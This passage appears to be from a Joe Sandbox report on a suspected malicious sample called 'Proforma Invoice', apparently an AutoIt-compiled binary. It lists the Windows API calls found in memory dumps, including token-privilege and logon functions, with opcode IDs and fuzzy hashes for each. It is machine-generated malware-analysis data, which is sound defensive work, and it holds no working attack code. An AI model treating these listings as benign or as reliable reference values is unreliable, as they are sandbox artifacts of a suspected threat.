                                                                                                • Instruction Fuzzy Hash: 40F0E23510522DFBDB20AFA4CC48FEA73ADBF09361F00826AF808D6181D6349900CBB5
                                                                                                APIs
                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006F8309), ref: 006F81E0
                                                                                                • CloseHandle.KERNEL32(?,?,006F8309), ref: 006F81F2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                • String ID:
                                                                                                • API String ID: 81990902-0
                                                                                                • Opcode ID: 192918e3590d69a80be220be55d107c6f8be72b1ad107bc87edeaf7e6bf8cba7
                                                                                                • Instruction ID: 16c46fb1a9c83e4e6c50d849e3d278614d5b6a52616da3e520d588839a44ccbd
                                                                                                • Opcode Fuzzy Hash: 192918e3590d69a80be220be55d107c6f8be72b1ad107bc87edeaf7e6bf8cba7
                                                                                                • Instruction Fuzzy Hash: 2EE0B672010611EEE7656B60EC09E777BAAEB08310B14896DF9A6C4471DB62AC91DB14
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,006C8D57,?,?,?,00000001), ref: 006CA15A
                                                                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006CA163
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: a86d0e0d16db831800a0153baa75fe32001ce225035b1ee5f74f30d3758fda72
                                                                                                • Instruction ID: 7325c4ebd2e840fa5ed99f7d37948012740163134ce0a257ecbc63be9267ef14
                                                                                                • Opcode Fuzzy Hash: a86d0e0d16db831800a0153baa75fe32001ce225035b1ee5f74f30d3758fda72
                                                                                                • Instruction Fuzzy Hash: 72B09231054208EBCA106B91EC09B883F78EB44AA2F408030F60D84062CB6656528A99
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9040b3f6137779ebfd699fffccfa800268ce40cb1da8c9a38d3165dee545a4e5
                                                                                                • Instruction ID: 3cc88b70fc918d9e33fc1e31a599fee5c8b1d9a6d6aa6c8affa6cca500eb854e
                                                                                                • Opcode Fuzzy Hash: 9040b3f6137779ebfd699fffccfa800268ce40cb1da8c9a38d3165dee545a4e5
                                                                                                • Instruction Fuzzy Hash: 533246A1D29F454DEB279634C832336A25AEFB73C5F14D73BF819B5AA5EB28C4834104
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 7722d96e098550a6d7eca8ea74b6750987e8fd2106315307150bdcd92332d96a
                                                                                                • Instruction ID: 3da25e25355a0094303d397f963cf4e59c03f53a1237d38135c2504364e6483d
                                                                                                • Opcode Fuzzy Hash: 7722d96e098550a6d7eca8ea74b6750987e8fd2106315307150bdcd92332d96a
                                                                                                • Instruction Fuzzy Hash: 22B11221D2AF414DE32396398832336B75CAFBB2C6F51D71BFC6674E22EB2685834145
                                                                                                APIs
                                                                                                • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,006F8389), ref: 006F87D1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: LogonUser
                                                                                                • String ID:
                                                                                                • API String ID: 1244722697-0
                                                                                                • Opcode ID: 07f4ff8b8e00f428f190a6cbd8e42cbeb42264cca3d3b7b161f0a04dc442fe64
                                                                                                • Instruction ID: 28c3acb82be929ee527d7d5d2d2bb86c87d2b47a91833e1e73381c9a22238616
                                                                                                • Opcode Fuzzy Hash: 07f4ff8b8e00f428f190a6cbd8e42cbeb42264cca3d3b7b161f0a04dc442fe64
                                                                                                • Instruction Fuzzy Hash: 56D05E3226050EABEF118EA4DD01EAE3B69EB04B01F408121FE15D50A1C775D835AB60
                                                                                                APIs
                                                                                                • SetUnhandledExceptionFilter.KERNEL32(?), ref: 006CA12A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                • String ID:
                                                                                                • API String ID: 3192549508-0
                                                                                                • Opcode ID: c2fdbe12997935ff33c54e375dd8b48b839b1a55c461677815edcaff87f0644e
                                                                                                • Instruction ID: 8988669d1c7a43d36131d49ef5b22471cb4c12cd412c30df058640f8cceca0da
                                                                                                • Opcode Fuzzy Hash: c2fdbe12997935ff33c54e375dd8b48b839b1a55c461677815edcaff87f0644e
                                                                                                • Instruction Fuzzy Hash: 52A0113000020CEB8A002B82EC08888BFACEA002A0B008030F80C80022CB32AA228A88
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 37cdbf56ebb5aa71fd0f89da039c85e9992d2177d929db4992a73786cd6ede30
                                                                                                • Instruction ID: 586f4001368259dcb784c053ba749e25762773b7718005fe82935dbd27da384e
                                                                                                • Opcode Fuzzy Hash: 37cdbf56ebb5aa71fd0f89da039c85e9992d2177d929db4992a73786cd6ede30
                                                                                                • Instruction Fuzzy Hash: 08223671A0460ACFDF388A28C4946FC77A7FF41344F28816ADA468B692DB74ADC2C741
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                • Instruction ID: 43a9616708f7648d36d4cc9833fbc4bf12621a77d8fb3499a520eb33bc1e728a
                                                                                                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                • Instruction Fuzzy Hash: 04C1B7322050930AEB1D4639C434A7EBBA2DEA37B131A175ED8B3CF2C5EE14D975D650
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                • Instruction ID: 03a685bc6fe56e7e02f127980197fdb84a93b2d0f8b94f04125bb40e3e819610
                                                                                                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                • Instruction Fuzzy Hash: ABC1FA321051930ADF2D463AC474A7EBAA2DE937B131A135ED8B3CF2C5EE20D975D660
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                • Instruction ID: 8d9020d75f9f2bc1b892df0eb7a4af365b5acb5d5f5c8b1c04d87a5ee7f7f76b
                                                                                                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                • Instruction Fuzzy Hash: A9C188322051930AEF1D4639C434ABEBAA2DEA37B131A175ED4B3CF2C6EE10D975D650
                                                                                                APIs
                                                                                                • DeleteObject.GDI32(00000000), ref: 0071785B
                                                                                                • DeleteObject.GDI32(00000000), ref: 0071786D
                                                                                                • DestroyWindow.USER32 ref: 0071787B
                                                                                                • GetDesktopWindow.USER32 ref: 00717895
                                                                                                • GetWindowRect.USER32(00000000), ref: 0071789C
                                                                                                • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 007179DD
                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 007179ED
                                                                                                • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00717A35
                                                                                                • GetClientRect.USER32(00000000,?), ref: 00717A41
                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00717A7B
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00717A9D
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00717AB0
                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00717ABB
                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00717AC4
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00717AD3
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00717ADC
                                                                                                • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00717AE3
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00717AEE
                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00717B00
                                                                                                • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00732CAC,00000000), ref: 00717B16
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00717B26
                                                                                                • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00717B4C
                                                                                                • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00717B6B
                                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00717B8D
                                                                                                • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00717D7A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                • API String ID: 2211948467-2373415609
                                                                                                • Opcode ID: 487620114aef5456389ec9132da64ced299cd7aafec309d0f3d7900fdb8aa726
                                                                                                • Instruction ID: b197d1d395c897618270c10e688a6faea9fbefaddf0c84878e3f01bae044eb03
                                                                                                • Opcode Fuzzy Hash: 487620114aef5456389ec9132da64ced299cd7aafec309d0f3d7900fdb8aa726
                                                                                                • Instruction Fuzzy Hash: 2B026E71900215EFDB14DFA8DD89EAE7BB9FF49310F108168F905AB2A1C778AD41CB64
                                                                                                APIs
                                                                                                • CharUpperBuffW.USER32(?,?,0072F910), ref: 00723627
                                                                                                • IsWindowVisible.USER32(?), ref: 0072364B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: BuffCharUpperVisibleWindow
                                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                • API String ID: 4105515805-45149045
                                                                                                • Opcode ID: 914fbf2c9a6bc8f679fb76d3e3d93b3a438d66eac5cc122db374c724ad0891f9
                                                                                                • Instruction ID: c5cfac6550969275876c884c12d50957252e3dd58cf1e99a63bd82e4e33dcb93
                                                                                                • Opcode Fuzzy Hash: 914fbf2c9a6bc8f679fb76d3e3d93b3a438d66eac5cc122db374c724ad0891f9
                                                                                                • Instruction Fuzzy Hash: C5D18D30208311DBCB44EF10D451AAEB7A6EF95344F14486CF9865B3A2DB3DEE4ACB95
                                                                                                APIs
                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0072A630
                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 0072A661
                                                                                                • GetSysColor.USER32(0000000F), ref: 0072A66D
                                                                                                • SetBkColor.GDI32(?,000000FF), ref: 0072A687
                                                                                                • SelectObject.GDI32(?,00000000), ref: 0072A696
                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 0072A6C1
                                                                                                • GetSysColor.USER32(00000010), ref: 0072A6C9
                                                                                                • CreateSolidBrush.GDI32(00000000), ref: 0072A6D0
                                                                                                • FrameRect.USER32(?,?,00000000), ref: 0072A6DF
                                                                                                • DeleteObject.GDI32(00000000), ref: 0072A6E6
                                                                                                • InflateRect.USER32(?,000000FE,000000FE), ref: 0072A731
                                                                                                • FillRect.USER32(?,?,00000000), ref: 0072A763
                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0072A78E
                                                                                                  • Part of subcall function 0072A8CA: GetSysColor.USER32(00000012), ref: 0072A903
                                                                                                  • Part of subcall function 0072A8CA: SetTextColor.GDI32(?,?), ref: 0072A907
                                                                                                  • Part of subcall function 0072A8CA: GetSysColorBrush.USER32(0000000F), ref: 0072A91D
                                                                                                  • Part of subcall function 0072A8CA: GetSysColor.USER32(0000000F), ref: 0072A928
                                                                                                  • Part of subcall function 0072A8CA: GetSysColor.USER32(00000011), ref: 0072A945
                                                                                                  • Part of subcall function 0072A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0072A953
                                                                                                  • Part of subcall function 0072A8CA: SelectObject.GDI32(?,00000000), ref: 0072A964
                                                                                                  • Part of subcall function 0072A8CA: SetBkColor.GDI32(?,00000000), ref: 0072A96D
                                                                                                  • Part of subcall function 0072A8CA: SelectObject.GDI32(?,?), ref: 0072A97A
                                                                                                  • Part of subcall function 0072A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0072A999
                                                                                                  • Part of subcall function 0072A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0072A9B0
                                                                                                  • Part of subcall function 0072A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0072A9C5
                                                                                                  • Part of subcall function 0072A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0072A9ED
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                • String ID:
                                                                                                • API String ID: 3521893082-0
                                                                                                • Opcode ID: 90d5394c32ec7977708fb17944b0b88043bb63c38e5358f100dd7df41ecd9440
                                                                                                • Instruction ID: 34a3dbfd2a0a6ca3c9b56e81b15b11e3fb5dcaf6a13168f4ffc28ceb5b17206e
                                                                                                • Opcode Fuzzy Hash: 90d5394c32ec7977708fb17944b0b88043bb63c38e5358f100dd7df41ecd9440
                                                                                                • Instruction Fuzzy Hash: 28918C72408315FFC7219F64EC08E5B7BB9FF88321F108A29F962961A0D738D946CB56
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(?,?,?), ref: 006A2CA2
                                                                                                • DeleteObject.GDI32(00000000), ref: 006A2CE8
                                                                                                • DeleteObject.GDI32(00000000), ref: 006A2CF3
                                                                                                • DestroyIcon.USER32(00000000,?,?,?), ref: 006A2CFE
                                                                                                • DestroyWindow.USER32(00000000,?,?,?), ref: 006A2D09
                                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 006DC43B
                                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 006DC474
                                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 006DC89D
                                                                                                  • Part of subcall function 006A1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,006A2036,?,00000000,?,?,?,?,006A16CB,00000000,?), ref: 006A1B9A
                                                                                                • SendMessageW.USER32(?,00001053), ref: 006DC8DA
                                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 006DC8F1
                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006DC907
                                                                                                • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 006DC912
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                • String ID: 0
                                                                                                • API String ID: 464785882-4108050209
                                                                                                • Opcode ID: d5b0a699ccd0f45ca29f698f3598ea56be980ec6b71e8a6e4533671b66c60d97
                                                                                                • Instruction ID: 0dd7184d3b08c492086725ca5c642077d47c84c419c943d5a879057a7de0f6fb
                                                                                                • Opcode Fuzzy Hash: d5b0a699ccd0f45ca29f698f3598ea56be980ec6b71e8a6e4533671b66c60d97
                                                                                                • Instruction Fuzzy Hash: 2F128C30904206AFDB619F28C894BA9BBE6FF45320F54856AE456CB362C731EC52DF91
                                                                                                APIs
                                                                                                • DestroyWindow.USER32(00000000), ref: 007174DE
                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0071759D
                                                                                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007175DB
                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007175ED
                                                                                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00717633
                                                                                                • GetClientRect.USER32(00000000,?), ref: 0071763F
                                                                                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00717683
                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00717692
                                                                                                • GetStockObject.GDI32(00000011), ref: 007176A2
                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 007176A6
                                                                                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007176B6
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007176BF
                                                                                                • DeleteDC.GDI32(00000000), ref: 007176C8
